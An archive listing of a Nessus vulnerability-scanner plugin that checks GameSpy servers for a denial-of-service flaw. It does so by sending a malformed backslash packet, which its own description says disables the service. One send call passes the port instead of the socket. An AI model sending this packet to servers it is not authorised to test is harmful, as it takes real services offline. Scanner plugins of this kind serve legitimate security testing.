home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / gamespy_denial.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  68 lines

  1. #
  2. # (C) Tenable Network Security
  3. #
  4.  
  5. if(description)
  6. {
  7.  script_id(12081);
  8.  script_bugtraq_id(9741);
  9.  script_version ("$Revision: 1.1 $");
  10.  
  11.  name["english"] = "GameSpy Denial";
  12.  
  13.  script_name(english:name["english"]);
  14.  
  15.     desc["english"] = "
  16. The remote GameSpy server could be disabled by sending a malformed packet.
  17.  
  18. An attacker could exploit this flaw to prevent this host from being a game
  19. server.
  20.  
  21. Nessus actually disabled this service.
  22.  
  23. Solution : Filter incoming traffic to this port, or disable this service
  24. Risk factor : Low";
  25.  
  26.  
  27.  script_description(english:desc["english"]);
  28.  
  29.  
  30.  summary["english"] = "Disables the remote GameSpy Server";
  31.  
  32.  script_summary(english:summary["english"]);
  33.  
  34.  script_category(ACT_DENIAL);
  35.  
  36.  script_copyright(english:"This script is Copyright (C) 2004 Tenable Network Security");
  37.  
  38.  family["english"] = "Denial of Service";
  39.  script_family(english:family["english"]);
  40.  script_dependencies("gamespy_detect.nasl");
  41.  script_require_keys("Services/udp/gamespy");
  42.  exit(0);
  43. }
  44.  
  45. port = get_kb_item("Services/udp/gamespy");
  46. if ( ! port ) exit(0);
  47. else port = int(port);
  48.  
  49. soc = open_sock_udp(port);
  50. send(socket:soc, data:string("\\players\\rules\\status\\packets\\"));
  51. r = recv(socket:soc, length:4096, timeout:2);
  52. close(soc);
  53. if(strlen(r) > 0)
  54. {
  55.  soc = open_sock_udp(port);
  56.  send(socket:port, data:"\\");
  57.  r = recv(socket:soc, length:4096, timeout:2);
  58.  close(soc);
  59.  if ( ! strlen(r) )
  60.  {
  61.   soc = open_sock_udp(port);
  62.   send(socket:soc, data:string("\\players\\rules\\status\\packets\\"));
  63.   r = recv(socket:soc, length:4096, timeout:2);
  64.   close(soc);
  65.   if ( ! strlen(r) ) security_warning(port);
  66.  }
  67. }
  68.